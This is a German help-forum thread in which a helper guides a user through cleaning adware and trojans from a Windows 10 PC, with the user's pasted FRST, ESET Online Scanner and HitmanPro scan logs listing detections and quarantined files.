Description: Der Dienst "NVIDIA LocalSystem Container" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 1000 Millisekunden durchgeführt: Neustart des Diensts.

CodeIntegrity:
===================================
Date: 2017-02-13 20:42:44.656
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Program Files\Malwarebytes\Anti-Malware\mbae64.dll that did not meet the Store signing level requirements.

Date: 2017-02-13 20:42:44.656
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Program Files\Malwarebytes\Anti-Malware\mbae64.dll that did not meet the Store signing level requirements.

Date: 2017-02-13 20:40:18.579
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

Date: 2017-02-13 19:15:20.412
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

Date: 2017-02-13 19:15:17.050
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

Date: 2017-02-13 19:15:11.930
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

Date: 2017-02-12 22:25:39.778
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

Date: 2017-02-05 16:37:00.860
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

Date: 2017-02-05 16:30:05.983
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

Date: 2017-02-05 16:29:50.519
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

==================== Speicherinformationen ===========================

Prozessor: Intel(R) Xeon(R) CPU E3-1231 v3 @ 3.40GHz
Prozentuale Nutzung des RAM: 12%
Installierter physikalischer RAM: 16328.44 MB
Verfügbarer physikalischer RAM: 14270.47 MB
Summe virtueller Speicher: 32712.44 MB
Verfügbarer virtueller Speicher: 30554.83 MB

==================== Laufwerke ================================

Drive c: () (Fixed) (Total:232.35 GB) (Free:164.34 GB) NTFS
Drive d: (Daten) (Fixed) (Total:1862.89 GB) (Free:1789.88 GB) NTFS
Drive e: (Disc2) (CDROM) (Total:7.88 GB) (Free:0 GB) UDF

==================== MBR & Partitionstabelle ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 232.9 GB) (Disk ID: 6CF6904B)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=232.3 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=450 MB) - (Type=27)

========================================================
Disk: 1 (MBR Code: Windows 7 or 8) (Size: 1863 GB) (Disk ID: 00000000)

Partition: GPT.

==================== Ende von Addition.txt ============================

burningice · 13.02.2017, 21:39

Zitat:

Prozessor: Intel(R) Xeon(R) CPU E3-1231 v3 @ 3.40GHz
Installierter physikalischer RAM: 16328.44 MB

innerhalb von 50s bereinigt, temporäre Dateien gelöscht und neugestartet? Du lieber Schwan

kannst bitte bisschen genauer schauen und nicht immer die Hälfte in einem Zitat und nur die andere Hälfte wie gewünscht in code-tags posten?

Schritt: 1
Starte wieder Revo und deinstalliere damit wie vorhin diesmal folgendes Programm:
WinSnare

Schritt: 2

ESET Online Scanner

Hier findest du eine bebilderte Anleitung zu ESET Online Scanner
Lade und starte Eset Online Scanner
Setze einen Haken bei Ja, ich bin mit den Nutzungsbedingungen einverstanden und klicke auf Starten.
Aktiviere die "Erkennung von eventuell unerwünschten Anwendungen" und wähle folgende Einstellungen.
Klicke auf Starten.
Die Signaturen werden heruntergeladen, der Scan beginnt automatisch.
Klicke am Ende des Suchlaufs auf Fertig stellen.
Schließe das Fenster von ESET.
Explorer öffnen.
C:\Programme\Eset\EsetOnlineScanner\log.txt (bei 64 Bit auch C:\Programme (x86)\Eset\EsetOnlineScanner\log.txt) suchen und mit Deinem Editor öffnen (bebildert).
Logfile hier posten.
Deinstallation: Systemsteuerung => Software / Programme deinstallieren => Eset Online Scanner V3 entfernen.
Manuell folgenden Ordner löschen und Papierkorb leeren => C:\Programme\Eset

Hinweis: Dieser Scan kann schon einmal mehrere Stunden dauern...

(in deinem Fall Minuten

)

Schritt: 3
Downloade Dir HitmanPro

auf Deinen Desktop:

HitmanPro-32 Bit Version
HitmanPro-64 Bit Version

Starte die HitmanPro.exe
Klicke auf
Entferne den Haken bei
Klicke auf
und
Akzeptiere die Lizenzbedingungen und klicke auf
Klicke auf

und auf
Wenn der Scan beendet wurde, nichts löschen lassen etc. sondern wähle unten links auf der Button-Leiste
und speichere die Logdatei auf Deinem Desktop.
Schließe HitmanPro und poste mir das Log.

Schritt: 4
Bitte starte wieder FRST, setze den Haken bei Addition und drücke auf Untersuchen. Poste bitte wieder die beiden Textdateien, die so entstehen.

BaBi · 13.02.2017, 22:50

hihi, ja, der ist schon recht flott!

ESET hat in etwa ne halbe Stunde gebraucht.

Entschuldigung, da habe ich wohl nicht genau geschaut beim posten und hab code mit quote verwechselt...

ESET

Code:

ATTFilter

ESETSmartInstaller@High as downloader log:
all ok
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# EOSSerial=48630b108234a34b8ba50d8726966300
# end=init
# utc_time=2017-02-13 08:47:06
# local_time=2017-02-13 09:47:06 (+0100, Mitteleuropäische Zeit)
# country="Germany"
# osver=6.2.9200 NT 
Update Init
Update Download
Update Finalize
Updated modules version: 32394
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# EOSSerial=48630b108234a34b8ba50d8726966300
# end=updated
# utc_time=2017-02-13 08:51:54
# local_time=2017-02-13 09:51:54 (+0100, Mitteleuropäische Zeit)
# country="Germany"
# osver=6.2.9200 NT 
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# OnlineScanner.ocx=1.0.0.7777
# api_version=3.1.1
# EOSSerial=48630b108234a34b8ba50d8726966300
# engine=32394
# end=finished
# remove_checked=false
# archives_checked=true
# unwanted_checked=true
# unsafe_checked=false
# antistealth_checked=true
# utc_time=2017-02-13 09:25:17
# local_time=2017-02-13 10:25:17 (+0100, Mitteleuropäische Zeit)
# country="Germany"
# lang=1031
# osver=6.2.9200 NT 
# compatibility_mode_1=''
# compatibility_mode=5893 16776574 100 94 126586 18351733 0 0
# scanned=242302
# found=32
# cleaned=0
# scan_time=2001
sh=60348CB9F5E8441E9A5B124F6E5171AEFC740380 ft=1 fh=8c5584bc9127f60f vn="Variante von Win32/Adware.ELEX.CH Anwendung" ac=I fn="C:\AdwCleaner\quarantine\files\lrqkzkhhahecbbcndzqmcwucjlkucmif.back"
sh=46502222FCE1FABEE6B92122521D2C0BF3497A63 ft=1 fh=d00c70534a45d1d5 vn="Variante von MSIL/Toolbar.Linkury.BI eventuell unerwÃ¼nschte Anwendung" ac=I fn="C:\AdwCleaner\quarantine\files\awmafxjwktdmzodqxohucbnfvwxfmcbx\Nettrans.exe"
sh=EEE6A904175D4F85C6C2B09DEE04ABFD39EEBA89 ft=1 fh=7fe1730ae29aaf68 vn="Variante von Win32/Jawego.D eventuell unerwÃ¼nschte Anwendung" ac=I fn="C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\em.exe"
sh=20CEFED8DA05D9D6D971B9EEAAE67F55790AC366 ft=1 fh=ee32d64f49c5498f vn="Variante von Win32/SpeedBit.AS eventuell unerwÃ¼nschte Anwendung" ac=I fn="C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smci32.dll"
sh=AF90A252E7924ED590164A5486B3FB4D3209DEF0 ft=1 fh=192dbf22ad44c155 vn="Variante von Win64/SBWatchman.A eventuell unerwÃ¼nschte Anwendung" ac=I fn="C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smci64.dll"
sh=5E6CA58FFE8B5027466BE3C96DBB21745C35F908 ft=1 fh=20c6e147e1711cf5 vn="Variante von Win64/SBWatchman.A eventuell unerwÃ¼nschte Anwendung" ac=I fn="C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smu.exe"
sh=BA39F23D1789151AA6B794BA73D38D7F9A59B4F4 ft=1 fh=238a2416f5146f85 vn="Variante von Win32/SBWatchman.K eventuell unerwÃ¼nschte Anwendung" ac=I fn="C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\SMUninstall.exe"
sh=BCA6032EDE2E261731EA8A10D1D8797AA67263E4 ft=1 fh=ae11d5a639cf3bc4 vn="Variante von Win64/SpeedBit.D eventuell unerwÃ¼nschte Anwendung" ac=I fn="C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smw.sys"
sh=154D7EDC72BEE05A1335E9D11809F0292AF7BE47 ft=1 fh=207b6dbdac268b55 vn="MSIL/TrojanDownloader.Agent.CIY Trojaner" ac=I fn="C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Cofstock.exe"
sh=A588C029B36A62420BCC057DF4DA168BABA00AAC ft=1 fh=056ea767edfc5268 vn="Win64/Toolbar.Linkury.P eventuell unerwÃ¼nschte Anwendung" ac=I fn="C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Dong-Home.dll"
sh=AAE1183B1ECF9FD6532B140A10A3AF6A527CD11C ft=1 fh=6af2460041c267c8 vn="MSIL/Toolbar.Linkury.BP eventuell unerwÃ¼nschte Anwendung" ac=I fn="C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Fincore.exe"
sh=3613678877D994AF8F30656BC6C69AD0ADA52522 ft=1 fh=d2fcb80105f0a5e1 vn="Variante von Win32/Kryptik.FNEK Trojaner" ac=I fn="C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hayzumflex.exe"
sh=2A1F40DA5206C051B3A7F86950BB44E5C82EF367 ft=1 fh=3f89f06960e66555 vn="Win32/Toolbar.Linkury.BA eventuell unerwÃ¼nschte Anwendung" ac=I fn="C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Triszap.dll"
sh=154D7EDC72BEE05A1335E9D11809F0292AF7BE47 ft=1 fh=207b6dbdac268b55 vn="MSIL/TrojanDownloader.Agent.CIY Trojaner" ac=I fn="C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Cofstock.exe"
sh=AAE1183B1ECF9FD6532B140A10A3AF6A527CD11C ft=1 fh=6af2460041c267c8 vn="MSIL/Toolbar.Linkury.BP eventuell unerwÃ¼nschte Anwendung" ac=I fn="C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Hotjob.exe"
sh=A588C029B36A62420BCC057DF4DA168BABA00AAC ft=1 fh=056ea767edfc5268 vn="Win64/Toolbar.Linkury.P eventuell unerwÃ¼nschte Anwendung" ac=I fn="C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\ItTone.dll"
sh=2A1F40DA5206C051B3A7F86950BB44E5C82EF367 ft=1 fh=3f89f06960e66555 vn="Win32/Toolbar.Linkury.BA eventuell unerwÃ¼nschte Anwendung" ac=I fn="C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Stockdax.dll"
sh=3613678877D994AF8F30656BC6C69AD0ADA52522 ft=1 fh=d2fcb80105f0a5e1 vn="Variante von Win32/Kryptik.FNEK Trojaner" ac=I fn="C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Zaamla.exe"
sh=5E7BAC2E0DB69E88CECE5AEA71030A2454ABCF38 ft=1 fh=5a6e03de6d378d2b vn="Variante von MSIL/Toolbar.Linkury.BB eventuell unerwÃ¼nschte Anwendung" ac=I fn="C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\set.exe"
sh=7B44C50B877C9207CBC1AA884AA17901CAEE4FA5 ft=1 fh=642b7a3bffc6caf9 vn="Variante von MSIL/Adware.CsdiMonetize.J Anwendung" ac=I fn="C:\FRST\Quarantine\C\Program Files\PDR238V39I\22XHB7149.exe"
sh=7B44C50B877C9207CBC1AA884AA17901CAEE4FA5 ft=1 fh=642b7a3bffc6caf9 vn="Variante von MSIL/Adware.CsdiMonetize.J Anwendung" ac=I fn="C:\FRST\Quarantine\C\Program Files\XPQ0UG79CA\XPQ0UG79C.exe"
sh=7BF3DDDAB0180AF831534ED2EF434ADB899B55B9 ft=1 fh=9776102d408049fe vn="Variante von Win32/SpeedBit.AX eventuell unerwÃ¼nschte Anwendung" ac=I fn="C:\Users\Barbara\AppData\Local\Microsoft\Windows\INetCache\IE\2OT58FTF\BrowserAir48Inst[1].exe"
sh=E38BA4705D93E896C869FC62F2637D62C3DEA773 ft=1 fh=21a31174bfa49a0a vn="Variante von Win32/Kryptik.FICH Trojaner" ac=I fn="C:\Users\Barbara\AppData\Local\Microsoft\Windows\INetCache\IE\2OT58FTF\sam_IC[1]"
sh=9120DFB26488C50774ACB54990B2B379DBCB9A3C ft=1 fh=fb73d0392533a00f vn="Variante von Win32/Adware.ConvertAd.AJI Anwendung" ac=I fn="C:\Users\Barbara\AppData\Local\Microsoft\Windows\INetCache\IE\3T5QDGKZ\36noTpqwF[1].exe"
sh=9F650F399F426203134E0ED53BF37F438E8230BD ft=1 fh=2ea14636b02cec86 vn="Variante von MSIL/Adware.Imali.E Anwendung" ac=I fn="C:\Users\Barbara\AppData\Local\Microsoft\Windows\INetCache\IE\3T5QDGKZ\FinalInstaller_dotnet4[1].exe"
sh=5B56E5F874721C0A69FCE6DE237ED70BD1806CE8 ft=1 fh=1850820a77ecae40 vn="Variante von Win32/Adware.ConvertAd.AJQ.gen Anwendung" ac=I fn="C:\Users\Barbara\AppData\Local\Microsoft\Windows\INetCache\IE\3T5QDGKZ\KaSkllEk[1].exe"
sh=682400B0154383871744D3D1A89EAAAB3E18F575 ft=1 fh=c9b8f8986d94e3d1 vn="Variante von Win32/Adware.ConvertAd.AJW Anwendung" ac=I fn="C:\Users\Barbara\AppData\Local\Microsoft\Windows\INetCache\IE\8RFODISJ\1uIKINIHc[1].exe"
sh=2C9680DD339D3D7B0D87084C76941B03A06F64B9 ft=1 fh=6a31d972f30dd2a9 vn="Variante von Win32/Adware.ConvertAd.AJQ.gen Anwendung" ac=I fn="C:\Users\Barbara\AppData\Local\Microsoft\Windows\INetCache\IE\L91K04I9\qaSNDzr[1]"
sh=2C9680DD339D3D7B0D87084C76941B03A06F64B9 ft=1 fh=6a31d972f30dd2a9 vn="Variante von Win32/Adware.ConvertAd.AJQ.gen Anwendung" ac=I fn="C:\Users\Barbara\AppData\Local\Microsoft\Windows\INetCache\IE\L91K04I9\RCSv0xmq[1]"
sh=03ED3A68A1E49756A705E1DC3DF55E4F0748DC57 ft=1 fh=abf15076b9a5f28f vn="Variante von Win32/Kryptik.FOES Trojaner" ac=I fn="C:\Users\Barbara\AppData\Local\Microsoft\Windows\INetCache\IE\L91K04I9\sci0[1]"
sh=B82838CD05E1C3BA84D3B329744104FA2C26C2C9 ft=1 fh=0024593e6c5acc75 vn="Variante von Win32/DownloadGuide.D eventuell unerwÃ¼nschte Anwendung" ac=I fn="D:\Downloads\ccsetup510_CB-DL-Manager.exe"
sh=E574438F76DE020B30E25D6EADF4D2F6692E477B ft=0 fh=0000000000000000 vn="BAT/StartPage.NHU Trojaner" ac=I fn="D:\Program Files (x86)\The Witcher 2\Launcher.bat"

das hitman log ist riesig, muss ich separat posten... kleinen Moment

hitman teil 1

Code:

ATTFilter

HitmanPro 3.7.15.281
www.hitmanpro.com

   Computer name . . . . : BARBARA-PC
   Windows . . . . . . . : 10.0.0.14393.X64/8
   User name . . . . . . : Barbara-PC\Barbara
   UAC . . . . . . . . . : Enabled
   License . . . . . . . : Free

   Scan date . . . . . . : 2017-02-13 22:30:48
   Scan mode . . . . . . : Normal
   Scan duration . . . . : 4m 32s
   Disk access mode  . . : Direct disk access (SRB)
   Cloud . . . . . . . . : Internet
   Reboot  . . . . . . . : No

   Threats . . . . . . . : 34
   Traces  . . . . . . . : 37

   Objects scanned . . . : 1.632.920
   Files scanned . . . . : 38.566
   Remnants scanned  . . : 389.324 files / 1.205.030 keys

Malware _____________________________________________________________________

   C:\AdwCleaner\quarantine\files\awmafxjwktdmzodqxohucbnfvwxfmcbx\Nettrans.exe
      Size . . . . . . . : 43.520 bytes
      Age  . . . . . . . : 0.1 days (2017-02-13 20:38:15)
      Entropy  . . . . . : 5.5
      SHA-256  . . . . . : 45BEB593E85D817817C303534BB870F6D7A300CB727A9117FCD4FCB75C9C3159
      Product  . . . . . : Network Packet Monitor
      LanguageID . . . . : 0
    > Kaspersky  . . . . : not-a-virus:WebToolbar.Win32.Linkury.aqy
      Fuzzy  . . . . . . : 108.0
      Forensic Cluster
         -2.1s C:\ProgramData\NVIDIA\MessageBus_4656_0x24D19933300.log
         -2.1s C:\ProgramData\NVIDIA\MessageBus_4656_0x24D18F34700.log
         -1.8s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\
         -1.8s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\LICENSE.txt
         -1.8s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\openweb.bat
         -1.8s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\SnareWindowsInstallSupport.dll
         -1.8s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\stopweb.bat
         -1.8s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\s_32.ico
         -1.8s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\WinSnare.dll
         -1.7s C:\AdwCleaner\quarantine\files\mvmfgnrbrmdbsjisivmhfrvdpvtlbouw\
         -1.6s C:\AdwCleaner\quarantine\files\fpfqjlppnsdxcoxxfuaeemqptrzrgvpn\
         -1.6s C:\AdwCleaner\quarantine\files\fpfqjlppnsdxcoxxfuaeemqptrzrgvpn\BITB16.tmp
         -1.6s C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Micros_2d44ca29ef1bb45be9e81bd7c7de23bb1bff79c7_e127e73b_1c458c2c\
         -1.6s C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Micros_2d44ca29ef1bb45be9e81bd7c7de23bb1bff79c7_e127e73b_1c458c2c\Report.wer
         -1.6s C:\AdwCleaner\quarantine\files\wlhkcwthzxcfadlnsnitwidocovyfcvy\
         -1.6s C:\AdwCleaner\quarantine\files\wlhkcwthzxcfadlnsnitwidocovyfcvy\BITB27.tmp
         -1.5s C:\AdwCleaner\quarantine\files\lvghxrkdvjdmjauuvlqiouualgvwchnk\
         -1.4s C:\AdwCleaner\quarantine\files\atsifbjehqqalokjotexydyeaawktlln\
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\cookies
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\cookies-journal
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Web Data
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Web Data-journal
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\001180cbc33c583f_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\02cdb733b079655d_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\08bc571418449ead_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\092f95ee9c1fc61c_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0ad89b7fc5facf78_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0e02ff08b4002e57_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0ed73590870cfbd2_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0ed7399215f555d7_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0ef5b10d79d9f0cb_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0fc3db66b9cbe75d_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\1b72c2d37a2af109_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\1dff67c9badf383d_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\1e20774a42d716f3_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\1f2ec90a78c46fdf_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\2009bcf78a35d470_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\20ba89671f087fc1_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\234986793e71f265_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\26968e7a0c71776d_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\2819c5233c1f77b4_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\2ac381ccd53e2ce0_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\2b11e2e523e5d524_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\3082972055161e5d_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\3a977894dc0fcd39_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\442182c02ee0a243_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\5125b9f58b582f46_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\593d0e1547012291_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\5ede7465ad814101_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\66928cc3398bdbc9_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\66e510668b4796e9_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\6e2284174f43f7b0_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\711f9f610e35a8b6_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7150bac3e922a373_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7589f80f2ddeab29_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\775e37b82f99c13c_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7acdc9382bf6b139_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7d8cebaadfd53fbf_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7ecc93dfade6cf4e_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\8326a92c0f293bc4_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\83a226c1379f7a18_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\86850034110cf1c4_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\8d9b27c428a8f6a3_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\8f60e69a4afd6f60_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\95ff98c7e9c1b8a3_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\a1f309cd5a3eb6fa_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\a2719229322771c8_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\a2e6c4ddc62e67a7_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\b07d05bc07d9c08b_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\b3986aa6d1a5b1ca_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\b3edef432256edd5_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\b48454e7eeb33014_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\ba7c73f14dafe451_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\bd48447363dfb226_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\be189d201694bf89_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\bfbe9938bbb38577_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c0676a458818319d_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c3329b5e71fb9773_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c487316b1c7eb401_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c8bff37e9d993e8c_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c94b3024dfacfceb_0
